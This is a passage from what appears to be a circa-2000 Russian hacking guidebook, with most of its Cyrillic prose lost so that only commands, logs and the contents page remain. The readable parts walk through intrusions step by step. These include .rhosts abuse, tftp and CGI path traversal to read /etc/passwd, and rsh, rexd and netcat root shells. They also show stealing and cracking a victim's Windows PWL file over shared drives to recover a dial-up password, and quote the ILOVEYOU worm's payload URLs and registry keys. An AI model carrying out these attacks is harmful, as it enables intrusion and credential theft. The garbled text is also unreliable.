    rw 1 dolbilov dolbilov

    2196 Oct 30 1995 mbox

    drwxrxrx 2 dolbilov dolbilov

    512 Nov 25 1994 timezone

    $ echo '+ +' > .rhosts

    $ exitdevil# rsh l dolbilov

    thsun1.xxxx.xxxxx.su /bin/csh i

    $

    shell .

    5. sendmail

    devil# telnet www.xxx.ru 25

    Trying 193.124.xxx.xx

    Connected to www.xxx.ru.

    Escape character is '^]'.

    15:55:36 +0400

    vrfy serg

    550 serg User unknownvrfy alex

    250 Alexei E. Katov get

    /tmp/../../../../../../../../../etc/pa

    sswd /tmp/passwd

    tftp> quit

    devil#

    7. ftp

    ftp

    , . . .

    devil# ftp xxxxxxxxxxx.xxx.com
    Connected to xxxxxxxxxxx.xxx.com.
    220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready.
    Name (xxxxxxxxxxx.xxx.com:root): ftp
    331 Guest login ok, send ident as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> user root
    530 User root unknown.
    Login failed.
    ftp> user root
    530 User root unknown.
    Login failed.
    ftp> user foobar
    530 User foobar access denied.
    Login failed.
    ftp> quote pasv
    421 Service not available, remote server has closed connection
    ftp> o xxxxxxxxxxx.xxx.com
    Connected to xxxxxxxxxxx.xxx.com.
    220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready.
    Name (xxxxxxxxxxx.xxx.com:root): ftp
    331 Guest login ok, send ident as password.
    Password:
    230 Guest login ok, access restrictions apply.
    ftp> bin
    200 Type set to I.
    ftp> get core
    200 PORT command successful.
    150 Binary data connection for core (194...,51553) (281136 bytes).
    226 Binary Transfer complete.
    local: core remote: core
    281136 bytes received in 16 seconds (17 Kbytes/s)
    ftp> bye
    221 Goodbye.
    devil#

    /********** Fragment of core ************/

    .994:..S.:.

    srk: a2U/fw.FWhk:.::::..S

    :


    __ /

    harat:__mQb7Pij8mrA:.::::..S@

    kchu:__/sPKnswJ8y2:9.::::..S`yhew:__0/L6foNhPoA:9.:::: ..S.

    :h6qh9see7ry .M:9353:.:.

    pa ..S.WGZ/NEzsLjwe 2:9097::..

    flo ..S.Xbra.0mg/PMc :9097:::.

    dave ..S.0VnE0zICamE: 9097::::.

    on:2 ..T.VqQO2BOU:909 7::::::..:/*************************************

    ***/

    __.

    7. rexd

    devil# su daemon
    $ on -i faxnetxx.xxx.ru /bin/sh -i
    $ uname -a
    faxnetxx faxnetxx 3.2 2 i386
    $ id
    uid=1(daemon) gid=1(other)
    $

    8. .

    rpc. .

    X server

    X 6000+ . magiccookies xhost +, ,

    , (xspy, xpush). 6000 , denial_of_service .

    rlogin talkd

    , . rlogin TERM, talkd , . , . root.


    rsh rexec

    rsh rexec

    , , NFS .


    log. ,

    root (/etc/default/login).

    devil# rsh -l smtp xxxx.xxx.ru /bin/csh -i
    Warning: no access to tty; thus no job control in this shell
    # id
    uid=0(root) gid=0(root)
    devil# nc -v xxxx.xxx.ru 512
    xxxx.xxx.ru [194.85.xxx.xxx] 512 (exec) open
    ^@root^@rootpasswd^@/bin/csh -i^@
    Warning: no access to tty; thus no job control in this shell
    # id
    uid=0(root) gid=1(other)

    9. .

    ,

    , . .rhosts hosts.equiv., ,

    , . DNS NIS .

    EssentialNetTools 2.2 , Internet , EssentialNetTools 2.2. . , . ,


    . , ,

    , Add Record. . , : ,


    ,

    (pwl, user.dar, system.dat ...). , Internet, Microsoft,

    .

    (EssentialNetTools ). NBScan IP

    , . , RS YES, IP NATShell(starting ip = ending ip), use default NAT list . Go ( , ).

    , . LMHost IP ,

    , IP

    . : NBScan, Open Computer. ,, ,

    Share. Share Name \\\ , , Mount.

    ,

    .

    NetTool (, Essential) , ,

    ( , NBScan , ).


    Internet

    , , . .


    , .

    . ,

    . : , .

    Internet , , .

    . ,

    : , ( , ). :

    , , , , , , ,

    . : ,, ?: ( ) , .

    .

    , , : ,

    . : Lta13?Lp ! : ! ,


    : ,, .. ,

    . , , .


    !

    , , . DialUp . , . , , ,

    , . , , : , Internet .

    Windows

    95/98? , Windows 95/98 , PWL. ,

    , , (,), PWL. ,

    , ,

    (HIEW, QVIEW), . MSPWL32.DLL. . ( N) . .

    N (X). X+N, 8 , (Y). X+Y, 8, (Z).

    XOR Z , , ( , ?). ? ( ).

    ( ), XOR. , . , xor


    byte ptr [eax+ebp],cl. , ? ,

    .

    , ,


    . ,

    30h,0Ch, 28h . . MSPWL32.DLL , 511h ( , ), 90h,90h, 90h NOP (). ,

    ! ? ! . !!! , : / , , !

    , , . , Windows : .,

    MSDOS, , .

    , , PWL, Windows :

    , ,

    Windows , . ? ! ! USER.DAT! : Windows 95 M. D.! , Internet,

    email . , , , , ( ). email, ( ). :

    M. D.! POP3 , DialUp! ? . email PWL, USER.DAT, , , ! ??? !

    UUE, , 8 10. .


    10 . 30h, , 7Ah,

    30h 9 10

    . ! , no sex for you. ,


    30h, 9 10

    . . , 3Dh. , 0Dh( ) + 30h. 0Dh, 0Ah: .

    , , : ! , . : Internet Mail, & reg; . REGEDIT, HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/: Password. Internet Mail. ,

    , . , , , , .

    . REGEDIT, / . , (*) .. . , () 3Dh

    ! 15.

    ? ,, , , ? !

    , USER.DAT. HKEY_CURRENT_USER/RemoteAccess/Addresses: . , , ,! ,

    , ( XOR). ASCII (, , ,


    , : , , ?)

    SPYWIN, HOOKDUMP, KEYWITNESS. ,


    ?).

    HKEY_CURRENT_USER/RemoteAccess/Profile/""/IP: 0Ch

    DNS,

    ..

    HKEY_CURRENT_USER/RemoteAccess/Profile/""/User: .

    HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/InternetSettings/ProxyServer: Proxy .

    HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail:

    DefaultPOP3Server:

    DefaultSMTPServer:

    SenderEMail:

    Name:

    Organization:

    .

    POP3 "POP3":

    Account: Password: ,

    , ? , ? .

    .

    , .

    : Internet.

    ! , , , , .

    , , , ? , ,

    Internet ,, . , ( )


    . ,

    . ? Windows 95/98/NT Legion. IP


    , , ,

    , , . , , , Internet,

    , . , , ,

    . , ?

    , . , Windows 95/98/NT ,

    , . , IP

    IP,

    . , . ,

    www.lamerishe.ru. mIRC, IRC status : /whois*.lamerishe.ru.

    :

    #RUSSIAN Andrey H andrey@dialup

    28059.lamerishe.ru :0 hello.*.junk.com

    End of /WHO list.

    :

    /dns Andrey

    mIRC IP

    :*** Looking up dialup

    28059.lamerishe.ru

    *** Resolved dialup

    28059.lamerishe.ru to 121.31.21.10


    IP (121.31.21.10) . IP

    Windows. MSDOS. e: Enter


    IP .

    Legion Enter Start IP ( IP) Enter End IP ( IP).

    Enter Start IP: 121.31.21.1

    Enter End IP: 121.31.21.254

    Scan. , , \\121.31.21.87\C, IP C.

    MAPPED ONDRIVE E:. , IP , c ( ) . . (

    ), , , . , .pwl, .

    Enter.

    . Windows . : E:\>dir win* :

    : 224715D0

    :\WIN95 113098 6:48p WIN95

    0 (,) 0

    1 (,) 287,997,952

    :

    E:\>cd win95
    E:\WIN95>dir *.pwl
    : 224715D0
    :\WIN95
    ANDREY PWL 730 020599 10:31p ANDREY.PWL
    1 (,) 730
    0 (,) 287,997,952
    E:\WIN95>copy andrey.pwl c:\hacking\pwlhack

    , .pwl, .

    Internet. :

    : L5tRe

    fsa3Xfa12


    ,

    E:\121.31.21.87\C, . . ? pwlhack andrey.pwl.

    C:\HACKING\PWLHACK>pwlhack.exe /list andrey.pwl andrey
    (C) 17Apr1998y by Hard Wisdom "PWL's Hacker" v3.0 (1996,97,98)
    Enter the password:
    File 'ANDREY.PWL' has size 730 bytes, version [NEW_Win95_OSR/2]
    for user 'ANDREY' with password '' contains:
    [Type][The resource location string][Password]
    Dial X *Rna\lamerishe\L5tRe fsa3Xfa12
    Indexed Entryes: 1; Number of resources: 1.

    !, , ,

    : fsa3Xfa12

    Internet,, , ( www.lamerishe.ru) ,

    Internet. , .

    ,

    Netbus1.0, Netbus Pro 2.0,BackOrifice .. , , IP , , ,

    IP.. .

    , ? . .


    PGPMail .

    .

    . , , . , Del


    . . . , INF (

    ). http://www.xakep.ru/soft/5/reg2inf.exe. , , . , INF

    , CSU , :

    [Version]
    Signature="$$"
    LayoutFile=bla.inf

    [DefaultInstall]
    DelReg=del.Reg

    [del.Reg]
    HKCU,"SOFTWARE\Microsoft\Internet Explorer\main","Home Page"

    ,

    Add :

    0,""

    . , INF CSU.INF ( , ,

    , ). :

    RUNDLL.EXE SETUPX.DLL,InstallHinfSection DefaultInstall 64 c:\csu.inf

    .

    . USER.DA0 SYSTEM.DA0 ( backup ). , . ,

    CSU.INF, CSUADD.INF, :

    RUNDLL.EXE

    SETUPX.DLL,InstallHinfSection


    , :

    (Windows 9x

    GetTickCount() ) . , ,


    (Windows 9x,Windows NT).

    LAN Manager( NT: 4.00 NT4,5.00 Windows 2000).

    : Master Browser,Backup Browser, PDC,BDC, RAS dialin server.

    , ,

    , Windows NT. netuse \\1.2.3.4\IPC$ password /user:username. ,

    shared resources, , , .

    (

    Guest, . shared resources .

    , . , .

    , shared resources.

    :

    NetBIOS overTCP/IP 135

    139 firewall

    1 HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous

    ( , ; ).

    Guest

    loginstation restrictions

    account lockout , , ,

    .

    NT IP (NetBIOS , ).

    : ANONYMOUS, ( )

    , .

    , ( 6 ). Dual Celeron 400MHz96Mb RAM 128 .

    . Intruders list,

    BlackICE, .

    254


    .

    :

    Null session 102

    6.7%

    Guest 1 57

    3.7%


    :

    10% Windows

    40% Windows, NetBIOS

    over TCP/IP, ()

    share, Internet,

    : Windows NT, (CONNECT: Administrator:.

    1524

    100%

    ping 442

    29%

    2 453.0%

    1 .. IPC$

    2 , .

    102 100%

    Windows 95/98 58 57%

    Windows NT SAMBA 44 43%

    177 100%

    10 6%

    ,

    10 6%

    Shared resources

    278 100%

    171 62%

    91 33%


    telnet c 139 . nbtstat. , Windows 95

    IP , ScanRange/Enter Start IP Scan Range/EnterEnd IP. ,


    Windows NT, ,, , .

    LEGION 2.1

    Legion 2.1, Rhino9,

    share , . , .

    IP, . x.x.x.1 x.x.x.255, . Scan Type/Scan Range,

    10.20.30.1 10.20.31.255 10.20.30.x 10.20.31.x. , IP , IP. Connection Speed Scan.

    :

    IP

    .

    A,M C 195.239.3.48 SPEDIA 195.239.3.64.


    MapDrive, Windows.

    LAN NetBios. , .

    Legion IP


    . NT4 Server Workstation, Windows 95/98. Pentium 100, 32 MBRAM, Windows NT4 / Windows98, 28.8 kbpsmodem. .

    Legion NetBios

    LAN, , firewall

    g

    . , . ,

    .

    Legion NT5

    Legion NT5, .

    Internet . , . , .,


    , . , ,

    .


    ,, , , . , , ,

    distributed.net, RSA RC5 64 .

    , , , .

    , , , . , , , , ,

    .

    . , , .

    , . , .


    . ,

    ) (UNIX/UNIX; ROOT/ROOT;ADMIN/ADMIN; SHELL/SHELL;GUEST/GUEST ..). Ha UNIXe

    (


    . , . , .

    Internet:

    , UNIX,

    shell.

    UNIXshella , (

    ( ) etc, passwd. , , , : ( ) passwd. , ,

    . Ha 10 200 . , , UNIX Crack , DOS CrackerJack.

    ,


    *, .

    /etc/shadow

    / t / it /* d t b


    , , . :

    /etc/security/passwd /tcb/auth/files/ /

    /tcb/files/auth/?/ /etc/master.passwd /etc/shadpw /etc/shadow /etc/tcb/aa/user/ /.secure/etc/passwd /etc/passwd[.dir|.pag] /etc/security/passwd.adjunct ##username /etc/shadow

    /etc/security/* database /etc/auth[.dir|.pag] /etc/udbHo ,

    . . ( ) getpwent(), pp (www.spider.ru) pp

    . p, , passwd : +::0:0:::. ,

    NIS (Network InformationServer)/YP (Yelow Pages). , ypcat passwd .


    VMS, SYS$SYSTEM:SYSUAF.DAT. VMS

    Internet


    CHECK_PASSWORD GUESS_PASSWORD, , , .

    shell. vi :set shell=/bin/sh, shell :shell. , passwd, . , /etc/utmp,/usr/adm/wtmp, /usr/adm/lastlog.

    vi , .

    ( ) Internet , ,

    . Internet , Internet . .

    . , , . . .. @

    . , @ , :[email protected]. ( , ,


    , :name_prov_login.txt).

    ,

    . , , IP, .

    transparent proxy server


    . , ( , , , ,

    ). . passlist.zip (*.zip ) http://www.astalavista.box.sk/, , , . , , , ,name_prov_pass.txt, , .

    proxyserver

    no transparentproxyserver,

    transparent proxy server . , . , email. email IP. , proxyserver. , . IP Kiss.Ru. , , , , IP.

    :

    IP

    var ip=document.f1.ip.value;


    document.write(ip);

    //>

    login. . , , ,


    , , IP. CGI. , , . . ADDR HOST, , notransparent.

    WWW .

    , , NEWBUGS , , . . , . ,

    , . . , FTPd, . . , HACKCRACK, HACKZONE HOLM . DoS ( ), shell. .

    rootshell.

    CGI. CGI, (Perl, PHP, CGI).

    CGI CitForum. , . ( ) CGI,


    . ! printstat.cgi. :

    printstat cgi?action=print&con=con&con

    . 195.34.32.10. http://195.34.32.10/cgibin/webplus?scripts=/../../../../etc/passwd.

    !


    printstat.cgi?action print&con con&con2=lpt1&id=csu

    CSU. , con2

    , , (, lpt1, print. display ..). , , GRINDER. . , , UNIX. . IP . ,

    , . , 1.1.1.1 255.255.255.255 /cgibin/webplus.cgi. IP,

    ! . . John the Ripper. , , . .

    VBS.LOVELETTER

    ILOVE YOU. ,

    ( Outlook LotusNotes). ILOVEYOU, kindlycheck the attached LOVELETTER comingfrom me. LOVE

    LETTERFORYOU.TXT.vbs. c:\windows Win32DLL.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\


    RunServices\Win32DLL. c:\windows\system MSKernel32.vbs LOVELETTERFORYOU.TXT.vbs.

    MSKernel32 vbs

    http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk

    4jnHHGbvbmKLJKjhkqj4w/WIN BUGSFIX


    MSKernel32.vbs HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServices\MSKernel32.

    . , c:\windows\system\LOVELETTERFORYOU.TXT.vbs. , .

    WINFAT32.EXE , Internet WINBUGSFIX.EXE. , :

    http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WINBUGSFIX.exe

    4jnHHGbvbmKLJKjhkqj4w/WINBUGSFIX.exe

    http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b

    3Vbvg/WINBUGSFIX.exe

    http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxc

    bvnmadshfgqw237461234iuy7thjg/WINBUGSFIX.exe

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN

    BUGSFIX. about:blank (). , . ( FAT32). ,


    , . . WINBUGSFIX.EXE

    ,

    . . ,

    . ,


    , . .jpg, .jpeg, .js, .vbs, .css,.vbe, .jse, .hta, .sct, .whs, . mp2 mp3. hidden , vbs. , queen_tsmgo.mp3, queen_tsmgo.mp3.vbs. c:\windows\system LOVE

    LETTERFORYOU.HTM, MSKernel32.vbs.

    mIRC SCRIPTS.INI (

    . mIRC , . ). , IRC, . , .

    . , . Veryfunny, Joke Mothers Day OrderConfirmation ( mothersday.vbs). . . , . , , .jpg .INI .BAT.

    , . .

    , , .

    Context kindlycheck the attached LOVELETTER comingfrom me. email [email protected] [email protected].


    XXX . (, copy,from . . ,

    ).

    type=button, submit, reset, text ), checked / . ,

    .


    ) ,

    METHOD. ( , ): POST GET. POST

    , GET . , ACTION=http://csu.ru/cgibin/xxx.cgi, : uname=hellerpasswd=xxxxxxxx,

    http://csu.ru/cgibin/xxx.cgi?umane=heller&passwd=xxxxxxxx.

    . : . : type ( INPUT. ,button , reset

    , submit ,text , radio ( ) checkbox ),name , value (

    , (:

    action="mailto:[email protected]?Subject=

    "CSU"")

    ( ), , , .

    VBScript. ,

    . :

    ,

    ,

    >

    VBSCRIPT





    . . PLAY. sub

    PLAY end sub ./


    /body

    , . ONCLICK=PLAY(). , , PLAY. JavaScript. VBScript , HTML. VBScript HTML

    >

    . , Script, .

    , ( HTML VBScript , JavaScript).

    dim c

    / . c . :

    c=document.f1.t1.value

    , . :

    document.f1.t2.value=c

    ! :

    ,

    ,

    >

    VBSCRIPT




    dim c

    sub play

    value=Enter onclick=play()>


    p y

    c=document.f1.t1.value

    document.f1.t1.value=c

    end sub

    >

    . . HTML. :

    1 100



    :


    1 100

    v=cInt(v)

    if qv then

    alert " "




    :

    dim q
    dim v
    dim p
    randomize
    sub start
    q=int(rnd(1)*100+1)
    p=0
    alert " 1 100"
    end sub
    sub play
    p=p+1
    v=document.f1.t1.value
    if q=v then
    document.write (" "&p&" ")
    end if
    end sub

    >

    ,

    , . . , .

    ( ), . , ( )


    . . ,

    , . ,

    . .

    ,


    ., .

    , . . .

    , , , . , . Legion.

    . IP , Map Drive. , .

    Legion 2.1? . , , Net BIOSa ,

    , . , sharinga. EssentialNetTools, Legion, .

    scriptkiddie. cgibugs cgi .

    cgi Voideye. , ,Damned CGI Scanner 2.1. . , , , void.ru .


    Internet.

    .


    , , , cgi.

    ,

    . , , , .. . . .

    , DCS 2.1 Essential Tools, . , Xavior .

    . , .

    ( ). .

    Internet. .

    , ,

    , , . : ( ) ,

    , . , ......


    1 . ,

    , .. , .. ,

    , .

    .

    .


    . :

    , 13 , , . .

    .

    , .

    .

    .

    .

    , . ,

    :,

    ?

    , , ?

    . Internet .


    , , 6 .

    ?

    ,

    , , .. , .

    , ,


    . 40 . , .

    ?

    !

    ( ) ,

    ( ) . . , , . , ,

    , , .

    .

    . ,

    , , .

    , ?

    , ?

    ? ???

    . , . . .

    : ,, , .

    , . ?


    ???

    .

    , . hacker.

    31337.?

    1. , . .

    2. ,


    ! .

    .

    . , . .

    2 . . , , . ,

    . . .

    , .

    3. ,

    , , . , Inetfordollars, [email protected],

    .4.

    , email telnet ,

    ., [email protected], :[email protected].


    5. , , .

    6.

    ( ) . ,

    , , Internet.


    .

    7. .

    , , , . , Internet.

    Spedia

    , Internet . , ,

    , .

    , ,

    , , !

    ,

    .

    Spedia! , 0.60$ ,

    , . , ?, . Internet

    , , , . , , ?


    Spedia , , . 2 .

    30 . $ .

    25% ;

    , ;


    300 ! : :

    , , Internet, , ,

    0.5 ; ,

    (email) ;

    , , ;

    ,

    .

    Spediabar, , , Tools Make Money Download. .

    , ! !


    WWW ( www.mail.ru)

    A V Komlin avkvladru@netscape net

    [email protected]

    http://cyberportal.narod.ru

    : tHe karamba

    IPtools

    : Pupkin Zade


    A.V. Komlin [email protected]

    (http://dore.on.ru/kpnc)

    FINNAN ([email protected])

    : Choosen

    :

    ANSI.SYS

    : Alexander Ermakov

    AVP

    : ZaDNiCa

    AVP

    : dr.golova

    *.BAT ? *.BAT !

    : gaszZone

    : PupkinZade

    http://kssoft.mastak.com/users/kssoft/iptools.eng/index.htm

    IPX

    :

    (user manual)

    : zLOB

    http://zlob.bos.ru

    MTC: Cfyz

    CD KERNEL32.DLL

    : Green Mouse

    : http://www.emedia.ru/

    : Travelling Wind

    http://rayon.promedia.minsk.by


    : Reanimator

    : zLOB

    http://www.zlob.net.ru/

    T l t

    !

    http://www.4prohack.cjb.net

    Windows Internet

    Maxim V. Stepin. EMail: [email protected]


    Telnet

    : =Sky12dooR=

    .

    : Yarix;

    Windows

    : =BFG=

    Windows:

    : Epsilon

    :

    MOOF ([email protected]; http://AnyNews.da.ru)

    Hacker Team

    hacker [email protected]

    FAQ

    relcom.fido.ru.hacker

    [email protected]

    [email protected]

    Windows Internet

    [email protected].

    DS Windows

    4prohack

    http://www.4prohack.cjb.net

    [email protected]

    Windows

    GrayFlint


    . . . . . . . . . . . . . . . . . . .3

    ? 10

    Internet: . . . . . . . . . . . . . . . . . . . . .175

    Internet . . . . . . . .180

    proxyserver . . . . . . . . . . . . . . . . . . . . . . . . .181

    WWW . . . . . . . . . . . . . . . .183

    C C


    ? . . . . . .10

    exploit? . . . . . . . . . . . . . . . . . . . . . .28

    root? . . . . . . . . . . . . . . . . . . . . . . . .30

    ! . . . . . . . . . . . . . . . . . . . . . .38

    . . . . . . . . . . . . . . . .49

    UIN: Bugs, Crack SocialIngineering . . . . . . . . . . . . . . . . . . . . . . . . . . . .50

    Internet . . . . . . . . .62

    . . .78

    . . . . . .116 . . . . . . . . . . . . . . . . . . . . . . . . . .134

    Internet . . . . . . . . . . . . . . . . . . . .137

    . . . . . . . . . . . . . . . . . . . . . . . . . .153

    shared Internet . .157

    Internet Windows Me . . . . . . . . . . . . .165

    LEGION 2.1 . . . . . . . . .167

    . . . . . . . . . . . . .170

    VBS.LOVELETTER . . . . . . . . . . . . . . . . . . . . . . .186

    VBScript . . . . . . . . . . . . . . . . . . . . . .192

    , . . . . . . .202

    . . . . . . . . . . . . . . .206

    Spedia . . . . . . . . . . . . . . . . . . . . . . . . . .213

    . . . . . .219


    :

    .127591, , ., . 53. . 1.

    http://www.bookpress.ru
